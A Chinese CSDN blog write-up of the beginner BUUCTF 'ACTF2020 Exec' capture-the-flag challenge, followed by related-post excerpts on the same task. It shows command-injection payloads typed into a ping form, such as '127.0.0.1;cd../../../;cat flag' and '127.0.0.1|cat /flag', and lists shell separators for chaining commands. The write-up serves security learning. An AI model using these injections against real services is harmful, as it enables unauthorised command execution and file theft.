buuctf-web入门-[ACTF2020 新生赛]Exec 1

最新推荐文章于 2024-05-16 14:19:51 发布
最新推荐文章于 2024-05-16 14:19:51 发布
阅读量353 收藏 2
点赞数 10
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80137226/article/details/136988501
版权
本文介绍了在一道命令注入题目中,通过ping命令的基本操作,逐步探测系统目录结构,发现安全漏洞的过程。作者展示了如何利用ls,cd,cat等命令进行目录遍历和文件访问,最终获取flag。
摘要由CSDN通过智能技术生成

一道简单的命令注入题

了解什么是ping


ping的基本介绍

我们首先尝试一下ping本机127.0.0.1(本地回环地址)

在此之前先了解一下常用的命令

ls                    //列明当前文件目录下内容
ls ../../../          //上翻三级目录,并列明内容
cat /flag             //打开flag文件
find / -name flag     //查找flag文件
rar x file1.rar       //解压rar包

我们尝试127.0.0.1;ls

可以看到没有过滤分号和ls

大致判断这道题没有过滤

然后再遍历目录,查找我们需要的flag

cd../;cd../../;

当../../../时发现flag

然后我们尝试看一下flag下是否还有目录

127.0.0.1;cd../../../flag;ls

发现没有

我们再尝试打开flag

127.0.0.1;cd../../../;cat flag

即可得到flag

2301_80137226
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
ctf题集【BUUCTF WEB】[ACTF2020 新生]Exec1
qq_42667028的博客
12-17 367
看来flag不在当前目录下,再次尝试输入127.0.0.1|ls /成功执行,尝试输入127.0.0.1|ls,尝试管道符执行。尝试输入:127.0.0.1|cat /flag。尝试一下ping 127.0.0.1是否成功。打开网址,得到一个ping的提示。
BUUCTF-[ACTF2020 新生]Exec1
Monica的博客
09-11 3847
目录 题目: 分析: 知识点: 方法: 方法1:;前面和后面命令都要执行,无论前面真假 方法2:|(就是按位或),直接执行|后面的语句 方法3:||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 方法4:&前面和后面命令都要执行,无论前面真假 方法5:&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 注意: 题目: 分析: 通过...
Buuctf-Web-[ACTF2020 新生]Exec 题解&思路总结_actf新生
最新发布
2401_84968101的博客
05-16 396
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
buuCTF】[ACTF2020 新生]Exec1
weixin_54957456的博客
10-11 2168
其实嘛,这篇wp主要写给自己看的,本人也是三天打鱼两天晒网的菜鸟,自己写wp才能验证真的学会了嘛。想要和我一起学习的朋友也拜托指出1我的不足啊! 这道题CSDN和其他博客上已经有很多wp了,每道wp的解法都不尽相同,所以这里本人在学习了解法后还总结归纳了一下其他大佬们所用的一些解法。 这道题是属于非常基础的命令执行题了,连空格和分号都没有过滤→_→。 方法一:常用的管道符 包括:|,||,&,&&,; 其中: | :按或位,直接执行管道符后的语句。 ...
buuctf [ACTF2020 新生]Exec1
2302_80009791的博客
02-12 554
本题考查linux命令,越权查询。
BUUCTF[ACTF2020 新生]Exec1
2201_75556700的博客
01-21 436
4.发现有个flag文件,开始查看输入127.0.0.1|cat /flag,得到flag。3.利用管道符查看目录输入127.0.0.1|ls /或者1 | ls /查看目录。2.需要输入地址,尝试输入127.0.0.1,出现下面这个提示,看不懂,没关系。
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
1. **矩阵运算**:MATLAB的基础是矩阵,它支持各种矩阵运算,如加法、减法、乘法、除法、转置、逆矩阵、求解线性方程组等。实例可能包括创建不同类型的矩阵(对角矩阵、单位矩阵、稀疏矩阵等),以及进行矩阵运算的...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件演示版使用CocoaPods进行安装播客文件Podfile添加到您的Podfile : pod 'PPJEmailPicker'用法以编程方式第1步-导入标题# import " PPJEmailPicker.h "第2步-创建...
光立方888 573 2803程序
06-14
1. 初始化:设置573和2803芯片的工作模式,如时钟频率、PWM占空比等。 2. 数据传输:编写代码将图像或动画数据发送到573芯片,由573将数据暂存并传送到对应的2803芯片。 3. 灰度控制:通过PWM技术控制2803芯片的输出...
BUUCTF Web [ACTF2020 新生]Exec
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Exec一、题目简介二、思路分析三、解题步骤1)遍历目录2)查看文件内容四、总结 一、题目简介 进入题目连接后,是一个ping的「功能」,我们输入ip地址或域名后可以使用ping命令「测试」网络的连通性 二、思路分析   &nbs.
Buuctf-Web-[ACTF2020 新生]Exec 题解&思路总结
m0_62239233的博客
04-22 529
常见的web漏洞——命令注入
BUUCTF]ACTF2020 新生Exec1write up
GZWZ_的博客
04-06 763
ping命令 Linux命令多种解法
BUU-[ACTF2020 新生]Exec 1
MateSnake的博客
03-14 2569
BUU-[ACTF2020 新生]Exec 1
BUUCTF】[ACTF2020 新生]Exec 1
qq_45972928的博客
05-06 1939
这是一道命令注入题 知识点 1、命令注入我们要防备其对于一些符号的过滤导致我们不能成功注入,所以我们要多了解一些符号。 2、直接分号分隔,一条一条顺序执行 3、| 按位或 4、|| 逻辑或 让||左边是执行错误的,这样它太会执行||右面的(这是计算机的惰性机制,只要前面执行正确了就不会再执行后面的了) 5、& 按位与 &前面和后面命令都要执行,无论前面真假 6、&& 逻辑与 如果前面为假,后面的命令就不执行,如果前面为真则再执行后面命令,这样两条命令都会被执行 1、进入网
buuctf [ACTF2020 新生]Exec 1
hintll的博客
06-14 3512
[ACTF2020 新生]Exec 1 打开以后是 有个输入窗口有个ping 可能是sql注入,也有可能是命令执行漏洞 先ping一下本机地址:127.0.0.1 有回显: PING 127.0.0.1 (127.0.0.1): 56 data bytes 那就基本确定是命令执行漏洞: 命令执行有一个参考: https://blog.csdn.net/hintll/article/details/117790643?spm=1001.2014.3001.5501 直接上手: 先看一下目录: 127.0.0
[BUUCTF011][ACTF2020 新生]Exec 1
m0_52674595的博客
12-03 257
[BUUCTF011] [ACTF2020 新生]Exec 1 ping地址 第一反应当然是Ping127.0.0.1 但是什么都没有得到 尝试能不能查找到可能包含flag 的flag文件 127.0.0.1;cat /flag 结果 直接 得到了flag 阿这 有点不可思议啊!!! 去网上看了看大家的wp 发现可以 一级一级的去寻找flag文件。 我们先来查看一下这里面的所有文件, 127.0.0.1|ls ../../../ 然后得到 然后再去cat flag即可 ...
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值